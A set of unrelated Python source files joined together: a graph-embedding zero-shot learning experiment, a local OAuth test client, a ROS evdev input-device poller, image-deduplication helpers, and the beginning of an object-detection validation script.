for c in unseen_classes:
dict_movie_edge = {}
for edge in self.dict_unseen_edges[c]:
if edge[0][0] == 'c':
movie = edge[1]
else:
movie = edge[0]
dict_movie_edge[movie] = edge
dict_class_movie_test[c] = dict_movie_edge.copy()
# if not os.path.exists(os.path.join('Graph-ZSL', self.args.data_name)):
# os.makedirs(os.path.join('Graph-ZSL', self.args.data_name))
with open(path2, 'wb') as fid:
pickle.dump(dict_class_movie_test, fid)
return dict_class_movie_test
def evaluate(self, dict_class_movie_test):
# evaluate
classes = list(dict_class_movie_test.keys())
pred_true = []
pred = []
# for i, k in enumerate(sorted(dict_class_movie_test, key=lambda x: len(dict_class_movie_test[x]), reverse=True)):
# classes[i] = k
num_classes = len(classes)
dict_measures = {'acc': {}, 'precision': {}}
dict_class_measures = {}
for c in classes:
class_movies = list(dict_class_movie_test[c].keys())
count = 0
for m in class_movies:
edges = np.array([np.repeat(m, num_classes), classes]).T
class_test = np.zeros(shape=(len(edges), 1))
# if set(self.args.embedding) != set('OGRE'):
class_test = self.edges_distance(edges)
# else:
# for i, edge in enumerate(edges):
# norm = self.edge_distance(edge)
# class_test[i, 0] = norm
# _, probs = self.predict_edge_classification(classif2, class_test)
# pred_index = np.argmax(probs.T[0])
pred_index = np.argmax(class_test)
prediction = edges[pred_index]
real_edge = list(dict_class_movie_test[c][m])
pred_true.append(c)
if prediction[0][0] == 'c':
pred.append(prediction[0])
else:
pred.append(prediction[1])
if prediction[0] == real_edge[0]:
if prediction[1] == real_edge[1]:
count += 1
elif prediction[1] == real_edge[0]:
if prediction[0] == real_edge[1]:
count += 1
accuracy = count / len(class_movies)
dict_measures['acc'] = accuracy
dict_class_measures[c] = dict_measures.copy()
with open(os.path.join(self.args.data_name, f'dict_class_measures_{self.embedding}_{self.args.norm}.pkl'),
'wb') as handle:
pickle.dump(dict_class_measures, handle, protocol=3)
# TODO dict class measures for every ratio
return dict_class_measures, pred, pred_true
def evaluate_for_hist(self, dict_class_movie_test):
# evaluate
classes = list(dict_class_movie_test.keys())
hist_real_unseen_pred = np.zeros(len(classes))
hist_real_unseen_first_unseen = np.zeros(len(classes))
pred_true = []
pred = []
# for i, k in enumerate(sorted(dict_class_movie_test, key=lambda x: len(dict_class_movie_test[x]), reverse=True)):
# classes[i] = k
num_classes = len(classes)
seen_flag = np.zeros(int(self.args.seen_percentage*len(classes)))
unseen_flag = np.ones(len(classes)-int(self.args.seen_percentage*len(classes)))
classes_flag = np.concatenate((seen_flag, unseen_flag))
dict_measures = {'acc': {}, 'precision': {}}
dict_class_measures = {}
for i, c in enumerate(classes):
class_movies = list(dict_class_movie_test[c].keys())
count = 0
for m in class_movies:
edges = np.array([np.repeat(m, num_classes), classes]).T
class_test = np.zeros(shape=(len(edges), 1))
# if set(self.args.embedding) != set('OGRE'):
class_test = self.edges_distance(edges)
# else:
# for j, edge in enumerate(edges):
# norm = self.edge_distance(edge)
# class_test[j, 0] = norm
# _, probs = self.predict_edge_classification(classif2, class_test)
# pred_index = np.argmax(probs.T[0])
try:
class_norm_test = np.column_stack((np.column_stack((class_test, classes)), classes_flag))
except:
print('a')
sorted_class_norm = class_norm_test[np.argsort(class_norm_test[:, 0])]
# if set(self.args.norm) == set('cosine'):
# sorted_class_norm = np.flip(sorted_class_norm)
# sort_classes = sorted_class_norm.T[0]
# else:
sort_classes = sorted_class_norm.T[1]
sort_norm = sorted_class_norm.T[0].astype(float)
sort_classes_flag = sorted_class_norm.T[2].astype(float)
# class_test[::-1].sort(axis=0)
prediction = np.array([m, sort_classes[0]])
# prediction = edges[pred_index]
real_edge = list(dict_class_movie_test[c][m])
pred_true.append(c)
if i > int(self.args.seen_percentage*len(classes)):
place = np.where(sort_classes == c)[0][0]
hist_real_unseen_pred[place] += 1
place = np.where(sort_classes_flag == 1)[0][0]
if self.args.unseen_weight_advantage*sort_norm[place] < sort_norm[0]:
pred.append(sort_classes[place])
else:
pred.append(sort_classes[0])
# pred.append(sort_classes[0])
# if prediction[0][0] == 'c':
# pred.append(prediction[0])
# else:
# pred.append(prediction[1])
if prediction[0] == real_edge[0]:
if prediction[1] == real_edge[1]:
count += 1
elif prediction[1] == real_edge[0]:
if prediction[0] == real_edge[1]:
count += 1
accuracy = count / len(class_movies)
dict_measures['acc'] = accuracy
dict_class_measures[c] = dict_measures.copy()
with open(os.path.join(self.args.data_name, f'dict_class_measures_{self.embedding}_{self.args.norm}.pkl'),
'wb') as handle:
pickle.dump(dict_class_measures, handle, protocol=3)
# TODO dict class measures for every ratio
return dict_class_measures, pred, pred_true, hist_real_unseen_pred
def hist_plot_for_unseen_dist_eval(self, distances):
title = 'Histogram Of The Distance Between \n Unseen Label Norm And Predicted Norm'
x_label = f'Distance, limit:{len(distances)}'
y_label = 'Count'
hist_plot(distances, title, x_label, y_label)
plt.savefig(f'{self.args.data_name}/plots/hist_distance_real_unseen-prediction_'
f'{self.embedding}_{self.args.norm}_{int(100*self.args.seen_percentage)}_seen_percent')
def confusion_matrix_maker(self, dict_class_measures, pred, pred_true):
conf_matrix = confusion_matrix(pred_true, pred, labels=list(dict_class_measures.keys()))
seen_true_count = 0
seen_count = 0
unseen_true_count = 0
unseen_count = 0
seen_number = int(self.args.seen_percentage * len(conf_matrix))
classes = list(dict_class_measures.keys())
seen_idx = []
unseen_idx = []
for i, c in enumerate(classes):
if len(set([c]).intersection(set(self.dict_unseen_edges.keys()))) > 0:
unseen_idx.append(i)
else:
seen_idx.append(i)
for i in seen_idx:
seen_true_count += conf_matrix[i][i]
for j in range(len(classes)):
seen_count += conf_matrix[i][j]
for i in unseen_idx:
unseen_true_count += conf_matrix[i][i]
for j in range(len(conf_matrix)):
unseen_count += conf_matrix[i][j]
# for i in range(len(conf_matrix))[:seen_number]:
# seen_true_count += conf_matrix[i][i]
# for j in range(len(conf_matrix)):
# seen_count += conf_matrix[i][j]
# for i in range(len(conf_matrix))[seen_number:]:
# unseen_true_count += conf_matrix[i][i]
# for j in range(len(conf_matrix)):
# unseen_count += conf_matrix[i][j]
accuracy = (seen_true_count + unseen_true_count) / (seen_count + unseen_count)
seen_accuracy = seen_true_count / seen_count
unseen_accuracy = unseen_true_count / unseen_count
print(f'accuracy all: {accuracy}')
print(f'accuracy all seen: {seen_accuracy}')
print(f'accuracy all unseen: {unseen_accuracy}')
return accuracy, seen_accuracy, unseen_accuracy, conf_matrix
def plot_confusion_matrix_all_classes(self, conf_matrix):
plt.figure(0)
title = f'Confusion Matrix, ZSL {self.args.data_name} \n' \
f'{self.embedding} {self.args.norm} {int(100 * self.args.seen_percentage)} Percent Seen'
x_title = f"True Labels {int(100 * self.args.seen_percentage)}/{100 - int(100 * self.args.seen_percentage)}" \
f" (seen/unseen)"
y_title = f"Predicted Labels"
plot_confusion_matrix(conf_matrix, title, x_title, y_title)
plt.savefig(f'{self.args.data_name}/plots/confusion_matrix_{self.embedding}_{self.args.norm}'
f'_{int(100 * self.args.seen_percentage)}_seen_percent')
from dataclasses import dataclass
@dataclass
class InventoryItem:
"""Class for keeping track of an item in inventory."""
data_name: str
threshold: float
norm: str
embedding: str
false_per_true: str
norm: str
def define_args(params):
print(params)
weights = np.array([params['weights_movie_movie'], params['weights_movie_class']]).astype(float)
parser = argparse.ArgumentParser()
parser.add_argument('--data_name', default=params['data_name']) # our_imdb, awa2
parser.add_argument('--threshold', default=params['threshold'])
parser.add_argument('--norm', default=params['norma_types']) # cosine / L2 Norm / L1 Norm
parser.add_argument('--embedding', default=params['embedding_type']) # Node2Vec / Event2Vec / OGRE
# embedding = params[2]
parser.add_argument('--false_per_true', default=10)
parser.add_argument('--ratio', default=[0.8])
parser.add_argument('--seen_percentage', default=float(params['seen_percentage']))
parser.add_argument('--embedding_dimension', default=int(params['embedding_dimensions']))
parser.add_argument('--unseen_weight_advantage', default=0.9)
parser.add_argument('--graph_percentage', default=1)
if params['data_name'] == 'awa2':
parser.add_argument('--awa2_attributes_weight', default=params['awa2_attributes_weight'])
import torch
cuda = torch.cuda.is_available()
parser.add_argument('--cnn', default='materials/resnet50-base.pth')
if cuda:
parser.add_argument('--gpu', default='0')
else:
parser.add_argument('--gpu', default='-1')
parser.add_argument('--consider-trains', action='store_false')
parser.add_argument('--output', default=None)
parser.add_argument('--images_threshold', default=0.10)
# embedding_dimension = params[3].astype(int)
args = parser.parse_args()
return args, weights
def obj_func_grid(params, specific_split=True, split=None): # split False or True
"""
Main Function for link prediction task.
:return:
"""
args, weights = define_args(params)
np.random.seed(0)
# ratio_arr = [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9]
graph_maker = GraphImporter(args)
# multi_graph = graph_maker.import_imdb_multi_graph(weights)
if args.data_name == 'our_imdb':
weighted_graph = graph_maker.import_imdb_weighted_graph(weights)
elif args.data_name == 'awa2':
awa2_att_weight = params['awa2_attributes_weight']
weighted_graph, split = graph_maker.import_awa2_graph(weights, specific_split, awa2_att_weight)
else:
raise ValueError(f"Wrong name of DataSet, {args.data_name}")
edges_preparation = EdgesPreparation(weighted_graph, args, split)
# dict_true_edges = edges_preparation.label_edges_classes_ordered(edges_preparation.label_edges)
# dict_false_edges = edges_preparation.make_false_label_edges(dict_true_edges)
dict_train_true = edges_preparation.dict_train_edges
dict_test_true = edges_preparation.dict_test_edges
dict_unseen_edges = edges_preparation.dict_unseen_edges
graph = edges_preparation.seen_graph()
embeddings_maker = EmbeddingCreator(graph, args.embedding_dimension, args)
if args.embedding == 'Node2Vec':
dict_embeddings = embeddings_maker.create_node2vec_embeddings()
elif args.embedding == 'Event2Vec':
dict_embeddings = embeddings_maker.create_event2vec_embeddings()
elif args.embedding == 'OGRE':
initial_nodes = edges_preparation.ogre_initial_nodes(graph)
dict_embeddings = embeddings_maker.create_ogre_embeddings(user_initial_nodes_choice=initial_nodes)
else:
raise ValueError(f"Wrong name of embedding, {args.embedding}")
classifier = Classifier(dict_train_true, dict_test_true, dict_unseen_edges,
dict_embeddings, args.embedding, args)
dict_class_movie_test = classifier.train()
dict_class_measures_node2vec, pred, pred_true, hist_real_unseen_pred = classifier.evaluate_for_hist(dict_class_movie_test)
# classifier.hist_plot_for_unseen_dist_eval(hist_real_unseen_pred)
accuracy, seen_accuracy, unseen_accuracy, conf_matrix = classifier.confusion_matrix_maker(
dict_class_measures_node2vec, pred, pred_true)
# classifier.plot_confusion_matrix_all_classes(conf_matrix)
return accuracy, seen_accuracy, unseen_accuracy
def flatten_dict(d):
def items():
for key, value in d.items():
if isinstance(value, dict):
for subkey, subvalue in flatten_dict(value).items():
yield key + "." + subkey, subvalue
else:
yield key, value
return dict(items())
def config_to_str(config):
config = flatten_dict(config)
return [str(config.get(k, "--")) for k in HEADER]
def run_grid(grid_params, res_dir, now):
grid_params = grid_params if type(grid_params) is dict else json.load(open(grid_params, "rt"))
res_filename = os.path.join(res_dir, f"{grid_params['data_name'][0]}_grid_{now}.csv")
out = open(res_filename, "wt")
out.write(f"{','.join(HEADER)}\n")
for config in grid(grid_params):
param = {p: config[i] for i, p in enumerate(list(grid_params.keys()))}
acc, seen_acc, unseen_acc = obj_func_grid(param)
table_row = config_to_str(param)
table_row[HEADER.index('acc')] = str(acc)
table_row[HEADER.index('seen_acc')] = str(seen_acc)
table_row[HEADER.index('unseen_acc')] = str(unseen_acc)
out.write(f"{','.join(table_row)}\n")
out.close()
def main():
seen_accuracies, unseen_accuracies = [], []
parameters = {
"data_name": ['our_imdb'], # 'awa2', 'our_imdb'
"embedding_type": ["Node2Vec"],
"embedding_dimensions": [32, 64, 128, 256],
# "weights_movie_class": [1],
# "weights_movie_movie": [1],
"weights_movie_class": np.logspace(-2, 3, 6),
"weights_movie_movie": np.logspace(-2, 3, 6),
"norma_types": ['cosine'],
"threshold": [0.3, 0.6, 0.9],
"seen_percentage": [0.8],
# "seen_percentage": np.linspace(0.1, 0.9, 9)
"awa2_attributes_weight": [100] # 100 is the best for now
}
num = 0
for param in grid(parameters):
dict_param = {p: param[i] for i, p in enumerate(list(parameters.keys()))}
# param = np.array([w_m_m, w_m_c, e_type, dim, norma_type, threshold, per, data, w_att])
print(f'iteration number {num}')
num += 1
acc, seen_acc, unseen_acc = obj_func_grid(dict_param)
seen_accuracies.append(seen_acc*100)
unseen_accuracies.append(unseen_acc*100)
# print("all accuracy: ", acc)
dict_measures = {"unseen_accuracy": unseen_accuracies, "seen_accuracy": seen_accuracies}
plots_2measures_vs_parameter(dict_measures, parameters["seen_percentage"], 'seen Percentage', 'our_imdb',
'Zero Shot Learning', "Accuracy", parameters["norma_types"][0],
parameters["embedding_type"][0])
if __name__ == '__main__':
res_dir = "C:\\Users\\kfirs\\lab\\Zero Shot Learning\\New-Graph-ZSL\\grid_results"
# now = datetime.now().strftime("%d%m%y_%H%M%S")
now = "01_03_21"
parameters = {
"data_name": ['our_imdb'], # 'awa2', 'our_imdb'
"embedding_type": ["Node2Vec"],
"embedding_dimensions": [32, 64, 128, 256],
# "weights_movie_class": [1],
# "weights_movie_movie": [1],
"weights_movie_class": np.logspace(-2, 3, 6),
"weights_movie_movie": np.logspace(-2, 3, 6),
"norma_types": ['cosine'],
"threshold": [0.3, 0.6, 0.9],
"seen_percentage": [0.8],
# "seen_percentage": np.linspace(0.1, 0.9, 9)
"awa2_attributes_weight": [100] # 100 is the best for now
}
processes = []
parameters_by_procesess = []
for w_m_m in parameters["weights_movie_movie"]:
for w_m_c in parameters["weights_movie_class"]:
param_by_parameters = parameters.copy()
param_by_parameters["weights_movie_movie"] = [w_m_m]
param_by_parameters["weights_movie_class"] = [w_m_c]
parameters_by_procesess.append(param_by_parameters)
for i in range(len(parameters_by_procesess)):
proc = multiprocessing.Process(target=run_grid, args=(parameters_by_procesess[i], res_dir, now, ))
processes.append(proc)
proc.start()
for p in processes:
p.join()
|
get_code.py
|
# pip install requests
# requests>=2.5.0
import threading
import requests
from pprint import pprint
import http.server as SimpleHTTPServer
import socketserver
api_port=5000
auth_url='http://127.0.0.1:5000/oauth/authorize'
server_port=3000
#redirect_url='http://127.0.0.1:3000'
redirect_uri='http%3A%2F%2F127.0.0.1%3A3000'
client_id='9a195ac5-1a34-4bdd-837e-13f80bc5364d'
print('Check client_id (../manage_py --id=1 uuid):')
print(client_id)
url=auth_url+('?redirect_uri=%s&client_id=%s' % (redirect_uri,client_id))+'&response_type=code&state=state_test&response_mode=query'
class Handler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def do_GET(self):
request_path = self.path
print('Request:')
pprint(request_path)
if not request_path.find('state=state_test'):
message='error: state=state_test'
else:
i=request_path.find('code=')
if i>0:
message=request_path[i:]
else:
message = 'error: code'
print('Message=%s' % message)
self.send_response(200)
self.end_headers()
class Server(socketserver.TCPServer):
def server_bind(self):
import socket
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.bind(self.server_address)
def start_httpd(port, server_class=Server, handler_class=Handler):
with server_class(('', port), handler_class) as server:
server.serve_forever()
def server_thread():
start_httpd(server_port)
try:
thread_type = threading.Thread(target=server_thread)
thread_type.start()
thread_type.join(4)
demo_login = {"user": "demo", "password": "demo"}
session = requests.Session()
login = session.post('http://localhost:%d/json_login' % api_port, None, demo_login)
cookies=session.cookies.get_dict()
response=session.get(url, cookies=cookies)
print('koniec testu')
print('Naciśnij ^C')
except Exception as e:
print("Error: %s" % e)
|
device.py
|
from io import BytesIO
import os
import selectors
from threading import Lock, Thread
from typing import Dict, Iterator, Optional, Tuple, Union, cast
import evdev
import rospy
from .shape import DeviceShape
from .util import evdev_util
from .util.evdev_const import DeviceAxis, DeviceEventType, DeviceKey, SyncEvent
class AxisBuf:
"""A buffer storing the state of a single absolute axis on an input device.
Axis values are remapped from a source interval [a, b] to a used-defined target
interval [a', b'], which allows for the normalization of joystick values.
"""
def __init__(self, init_value: float, from_min: float, from_max: float, to_min: float, to_max: float, deadband: float):
"""Creates a new buffer for an absolute axis with the given properties.
Parameters
----------
init_value : float
The initial axis value.
from_min : float
The minimum value for the source interval.
from_max : float
The maximum value for the source interval.
to_min : float
The minimum value for the target interval.
to_max : float
The maximum value for the target interval.
deadband : float
The ratio of input area on both sides of the input center that should be centered in the output.
"""
# Set up slopes and output offsets, as well as the bounds for the 3 regions introduced by the deadband
self._scale = (to_max - to_min) / ((1 - deadband) * (from_max - from_min))
self._offset = (to_max + to_min) / 2
input_center = (from_max + from_min) / 2
self._deadband_high = deadband * (from_max - input_center) + input_center
self._deadband_low = deadband * (from_min - input_center) + input_center
# Sort the regions in the event of inversion maps
self._low_region_lower_bound = min(self._deadband_low, from_min)
self._low_region_upper_bound = max(self._deadband_low, from_min)
self._high_region_lower_bound = min(self._deadband_high, from_max)
self._high_region_upper_bound = max(self._deadband_high, from_max)
self._center_region_lower_bound = min(self._low_region_upper_bound, self._high_region_lower_bound)
self._center_region_upper_bound = max(self._low_region_upper_bound, self._high_region_lower_bound)
# Update the output value
self._value = self._remap(init_value)
@property
def value(self) -> float:
"""The current remapped value of the axis.
Returns
-------
float
The remapped axis value.
"""
return self._value
def update(self, unmapped_value: float):
"""Writes a new value to the buffer.
Parameters
----------
unmapped_value : float
The unmapped axis value.
"""
self._value = self._remap(unmapped_value)
def _remap(self, unmapped_value: float) -> float:
"""Remaps an axis value to the target interval.
Parameters
----------
unmapped_value : float
The unmapped axis value.
Returns
-------
float
The remapped axis value.
"""
# TODO: This is an opportunity to improve code in the future if we migrate the wrover and base station to Python 3.10
if self._low_region_lower_bound <= unmapped_value <= self._low_region_upper_bound:
return self._scale * (unmapped_value - self._deadband_low) + self._offset
elif self._center_region_lower_bound <= unmapped_value <= self._center_region_upper_bound:
return self._offset
elif self._high_region_lower_bound <= unmapped_value <= self._high_region_upper_bound:
return self._scale * (unmapped_value - self._deadband_high) + self._offset
else:
raise ValueError(f"Value {unmapped_value} is not in the desginated input region of {(self._low_region_lower_bound, self._high_region_upper_bound)}")
class KeyBuf:
"""A buffer storing the state of a single button on an input device.
Considerably simpler than the axis buffer.
"""
def __init__(self, init_value: bool):
"""Creates a new buffer for a button.
Parameters
----------
init_value : bool
The initial state of the button.
"""
self.value = init_value
class InputDevice:
"""Represents a single input device and all of its state.
Instances of this class maintain a polling thread that consumes evdev events.
To ensure that the thread is cleaned up and to prevent deadlocks, users of this
class should make sure to call `kill` on an instance when it is no longer needed.
"""
def __init__(self, device: Union[str, evdev.InputDevice], shape: DeviceShape):
"""Constructs a new `InputDevice` instance for the given device.
The device will be polled for capabilities, which will allow for the creation
of state buffers for each axis and button on the device. To start the evdev
polling thread, call `start`; the `InputDevice` will not be able to track the
device's state until then.
Parameters
----------
device : Union[str, evdev.InputDevice]
The device, given either as a path to a device file or as an instance of
`evdev.InputDevice`.
shape : DeviceShape
The shape of the device.
See Also
--------
start : Initializes evdev polling.
"""
self.shape = shape
self._dev = device if isinstance(device, evdev.InputDevice) else evdev.InputDevice(device)
self._poll_thread_ctx: Optional[Tuple[Thread, int]] = None # thread and notify pipe
self._thread_lock = Lock()
self._axis_cache: Dict[DeviceAxis, AxisBuf] = {}
self._key_cache: Dict[DeviceKey, KeyBuf] = {}
self._data_lock = Lock()
# construct axis and key buffers based on the device's advertised capabilities
for ev_type, ev_caps in self._dev.capabilities().items():
ev_codes = evdev_util.get_capability_codes(ev_caps)
if ev_type == DeviceEventType.EV_ABS:
for code in ev_codes:
axis: DeviceAxis
try:
axis = DeviceAxis(code)
except ValueError:
continue
axis_def = shape.axes.get(axis)
if axis_def is None:
continue
axis_info = self._dev.absinfo(code)
self._axis_cache[axis] = AxisBuf(
axis_info.value, axis_info.min, axis_info.max, axis_def.min_val, axis_def.max_val, axis_def.deadband)
elif ev_type == DeviceEventType.EV_KEY:
init_key_states = set(self._dev.active_keys())
for code in ev_codes:
try:
self._key_cache[DeviceKey(code)] = KeyBuf(code in init_key_states)
except ValueError:
pass
def start(self):
"""Initializes the evdev polling thread.
This is what allows for the tracking of the device's state. Once this device
is no longer needed, the `kill` method should be called to ensure that the
polling thread is cleaned up properly in order to prevent resource leaks and
deadlocks.
Raises
------
ValueError
If the polling thread has already been started, or if the device has
already been shut down.
Notes
-----
Evdev events are organized into "frames", each of which is separated by an
EV_SYN event of code SYN_REPORT. Inputs should only be considered committed
when a whole frame has been sent. In the case where the event buffer overflows,
events will be lost, in which case the frame may be incomplete. This is
indicated by an EV_SYN event of code SYN_DROPPED, which signals to us that we
need to resynchronize with the frames. See [1]_ for more details.
References
----------
.. [1] https://www.freedesktop.org/software/libevdev/doc/latest/syn_dropped.html
"""
with self._thread_lock:
if self._dev.fd == -1:
raise ValueError('Device is already closed!')
elif self._poll_thread_ctx is not None:
raise ValueError('Poll thread already exists!')
# may deadlock if the device is lost, since the selector will never receive an event
# so we add a virtual pipe for the selector to read from that we can use to "break out"
notify_pipe_r, notify_pipe_w = os.pipe2(os.O_NONBLOCK)
def poll():
rospy.loginfo('Initializing evdev thread state...')
axis_temp: Dict[int, int] = dict() # temp buffers for the current incomplete frame
key_temp: Dict[int, int] = dict()
syn_okay = True # if SYN_DROPPED, this becomes false to indicate that the frame is fragmented
def consume_event(event: evdev.InputEvent):
nonlocal syn_okay
if event.type == DeviceEventType.EV_ABS: # axis state event
if syn_okay:
try:
axis_temp[DeviceAxis(event.code)] = event.value
except ValueError:
pass
elif event.type == DeviceEventType.EV_KEY: # key state event
if syn_okay:
try:
key_temp[DeviceKey(event.code)] = event.value
except ValueError:
pass
elif event.type == DeviceEventType.EV_SYN: # synchronization event
if event.code == SyncEvent.SYN_REPORT: # end of a sync frame
if syn_okay: # sync frame was okay; copy data for frame to state caches
for axis_code, state in axis_temp.items(): # copy axis state
try:
axis_buf = self._axis_cache.get(DeviceAxis(axis_code))
if axis_buf is not None:
axis_buf.update(state)
except ValueError:
pass
axis_temp.clear()
for key_code, state in key_temp.items(): # copy key state
try:
key_buf = self._key_cache.get(DeviceKey(key_code))
if key_buf is not None:
key_buf.value = state != 0 # 0 => release; 1 => press; 2 => hold
except ValueError:
pass
key_temp.clear()
else: # sync frame was bad; retrieve actual state using ioctl, then return to normal
syn_okay = True
for abs_code, abs_buf in self._axis_cache.items(): # resync axis states
abs_buf.update(self._dev.absinfo(abs_code.value).value) # shouldn't need to update other axis props... probably
for key_buf in self._key_cache.values(): # resync key states
key_buf.value = False
for key_code in self._dev.active_keys():
try:
key_buf = self._key_cache.get(DeviceKey(key_code))
if key_buf is not None:
key_buf.value = True
except ValueError:
pass
elif event.code == SyncEvent.SYN_DROPPED: # sync was lost; drop the sync frame and wait for the next one
axis_temp.clear()
key_temp.clear()
syn_okay = False
# check to ensure that the device is still there; better safe than sorry
with self._thread_lock:
if self._dev.fd == -1:
rospy.loginfo('Device was dead before the evdev thread was ready!')
return
with open(notify_pipe_r, 'rb') as notify_pipe_file:
# use selector to conjoin the device and the virtual "break-out" pipe
sel = selectors.DefaultSelector()
sel.register(self._dev, selectors.EVENT_READ)
sel.register(notify_pipe_file, selectors.EVENT_READ)
rospy.loginfo('Entering evdev polling loop...')
while True:
# read events
for key, _ in sel.select():
if key.fileobj == self._dev: # it's from evdev
for event in cast(Iterator[evdev.InputEvent], self._dev.read()):
consume_event(event)
else: # must be the virtual pipe
rospy.loginfo('Received notification from virtual pipe!')
cast(BytesIO, key.fileobj).read()
# terminate if the device is closed
with self._thread_lock:
if self._dev.fd == -1:
rospy.loginfo('The device was closed! Terminating the evdev thread...')
break
poll_thread = Thread(target=poll)
poll_thread.start()
self._poll_thread_ctx = poll_thread, notify_pipe_w
def get_axis(self, axis: DeviceAxis) -> Optional[float]:
"""Retrieves the state of an absolute axis.
The axis value will be normalized. See the `AxisBuf` class for more details.
Parameters
----------
axis : DeviceAxis
The axis whose state should be queried.
Returns
-------
Optional[float]
The axis' state, or `None` if there is no data available for it.
"""
with self._data_lock:
axis_buf = self._axis_cache.get(axis)
return axis_buf.value if axis_buf is not None else None
def get_key(self, key: DeviceKey) -> Optional[bool]:
"""Retrieves the state of a button.
Parameters
----------
key : DeviceKey
The button whose state should be queried.
Returns
-------
Optional[bool]
The button's state, or `None` if there is no data available for it.
"""
with self._data_lock:
key_buf = self._key_cache.get(key)
return key_buf.value if key_buf is not None else None
def kill(self):
"""Shuts down the device.
This closes any relevant file handles and terminates the polling thread.
The `InputDevice` instance can no longer be used once this is done.
"""
with self._thread_lock:
self._dev.close()
if self._poll_thread_ctx is not None:
os.write(self._poll_thread_ctx[1], b'\0') # write some random byte to break out of the selector read
os.close(self._poll_thread_ctx[1])
self._poll_thread_ctx[0].join()
self._poll_thread_ctx = None
|
util.py
|
from threading import Thread
from time import sleep
import webbrowser
from PIL import Image, ImageChops
import enum
from pathlib import Path
import imagehash
from send2trash import send2trash
def open_browser_tab(url):
def _open_tab():
sleep(1)
webbrowser.open_new_tab(url)
thread = Thread(target=_open_tab)
thread.daemon = True
thread.start()
def trim_image(im):
bg = Image.new(im.mode, im.size, im.getpixel((0,0)))
diff = ImageChops.difference(im, bg)
diff = ImageChops.add(diff, diff, 2.0, -100)
bbox = diff.getbbox()
if bbox:
im = im.crop(bbox)
return im
def shrink_image(im, max_width=800):
width, height = im.size
if width > max_width:
im.thumbnail((max_width, height * max_width / width))
return im
def remove_duplicate(file_path):
hashes = set()
for p in Path(file_path).glob('**/*.*'):
if p.suffix.lower() in {'.png', '.jpg', '.jp2', '.jpeg', '.gif'}:
h = imagehash.dhash(trim_image(shrink_image(Image.open(p))))
if h in hashes:
print('Deleting {}'.format(p))
send2trash(p)
else:
hashes.add(h)
class HAlign(enum.Enum):
LEFT = -1
CENTER = 0
RIGHT = 1
class VAlign(enum.Enum):
TOP = 1
MIDDLE = 0
BOTTOM = -1
|
val.py
|
import sys
import argparse
from pathlib import Path
from threading import Thread
import torch
import numpy as np
from tqdm import tqdm
from utils.callbacks import Callbacks
from models.experimental import attempt_load
from utils.datasets import create_dataloader
from utils.plots import plot_images, output_to_target
from utils.metrics import ap_per_class, ConfusionMatrix
from utils.torch_utils import select_device, time_sync
from utils.general import check_dataset, check_img_size, check_suffix, check_yaml, box_iou,\
non_max_suppression, scale_coords, xyxy2xywh, xywh2xyxy, set_logging, increment_path, colorstr
FILE = Path(__file__).resolve()
sys.path.append(FILE.parents[0].as_posix())
def save_one_txt(normed_pred, save_conf, shape, file):
# Save one txt result
gn = torch.tensor(shape)[[1, 0, 1, 0]] # normalization gain wh x wh
for *xyxy, conf, cls in normed_pred.tolist():
xywh = (xyxy2xywh(torch.tensor(xyxy).view(1, 4)) / gn).view(-1).tolist() # normalized x y w h
line = (cls, *xywh, conf) if save_conf else (cls, *xywh) # label format
with open(file, 'a') as f:
f.write(('%g ' * len(line)).rstrip() % line + '\n')
def process_batch(detections, labels, iou_thresholds):
"""
Return correct predictions matrix. Both sets of boxes are in (x1, y1, x2, y2) format.
Arguments:
detections (Array[N, 6]), x1, y1, x2, y2, conf, class
labels (Array[M, 5]), class, x1, y1, x2, y2
iou_thresholds: list iou thresholds from 0.5 -> 0.95
Returns:
correct (Array[N, 10]), for 10 IoU levels
"""
correct = torch.zeros(detections.shape[0], iou_thresholds.shape[0], dtype=torch.bool, device=iou_thresholds.device)
iou = box_iou(labels[:, 1:], detections[:, :4])
x = torch.where((iou >= iou_thresholds[0]) & (labels[:, 0:1] == detections[:, 5]))
if x[0].shape[0]:
# [label, detection, iou]
matches = torch.cat((torch.stack(x, 1), iou[x[0], x[1]][:, None]), 1).cpu().numpy()
if x[0].shape[0] > 1:
matches = matches[matches[:, 2].argsort()[::-1]]
matches = matches[np.unique(matches[:, 1], return_index=True)[1]]
matches = matches[np.unique(matches[:, 0], return_index=True)[1]]
matches = torch.Tensor(matches).to(iou_thresholds.device)
correct[matches[:, 1].long()] = matches[:, 2:3] >= iou_thresholds
return correct
def cal_weighted_ap(ap50):
return 0.2 * ap50[1] + 0.3 * ap50[0] + 0.5 * ap50[2]
@torch.no_grad()
def run(data,
weights=None, # model.pt path(s)
batch_size=32, # batch size
img_size=640, # inference size (pixels)
conf_threshold=0.001, # confidence threshold
iou_threshold=0.6, # NMS IoU threshold
task='val', # train, val, test, speed or study
device='', # cuda device, i.e. 0 or 0,1,2,3 or cpu
augment=False, # augmented inference
verbose=False, # verbose output
save_txt=False, # save results to *.txt
save_hybrid=False, # save label+prediction hybrid results to *.txt
save_conf=False, # save confidences in --save-txt labels
project='results/val', # save to project/name
name='exp', # save to project/name
exist_ok=False, # existing project/name ok, do not increment
half=True, # use FP16 half-precision inference
model=None,
dataloader=None,
save_dir=Path(''),
plots=True,
callbacks=Callbacks(),
compute_loss=None,
):
# Initialize/load model and set device
is_loaded_model = model is not None
grid_size = None
if is_loaded_model:
device = next(model.parameters()).device
else:
device = select_device(device, batch_size=batch_size)
# Directories
save_dir = increment_path(Path(project) / name, exist_ok=exist_ok)
(save_dir / 'labels' if save_txt else save_dir).mkdir(parents=True, exist_ok=True)
# Load model
check_suffix(weights, '.pt')
model = attempt_load(weights, map_location=device)
grid_size = max(int(model.stride.max()), 32)
img_size = check_img_size(img_size, s=grid_size)
# Data
data = check_dataset(data)
# Half
half &= device.type != 'cpu' # half precision only supported on CUDA
if half:
model.half()
# Configure
model.eval()
num_class = int(data['num_class'])
iou_thresholds = torch.linspace(0.5, 0.95, 10).to(device) # iou vector for [email protected]:0.95
num_thresholds = iou_thresholds.numel()
# Dataloader
if not is_loaded_model:
if device.type != 'cpu':
model(torch.zeros(1, 3, img_size, img_size).to(device).type_as(next(model.parameters())))
task = task if task in ('train', 'val', 'test') else 'val'
dataloader = create_dataloader(data[task], img_size, batch_size, grid_size, pad=0.5, rect=True,
prefix=colorstr(f'{task}: '))[0]
seen = 0
num_per_class = [0] * num_class
confusion_matrix = ConfusionMatrix(nc=num_class)
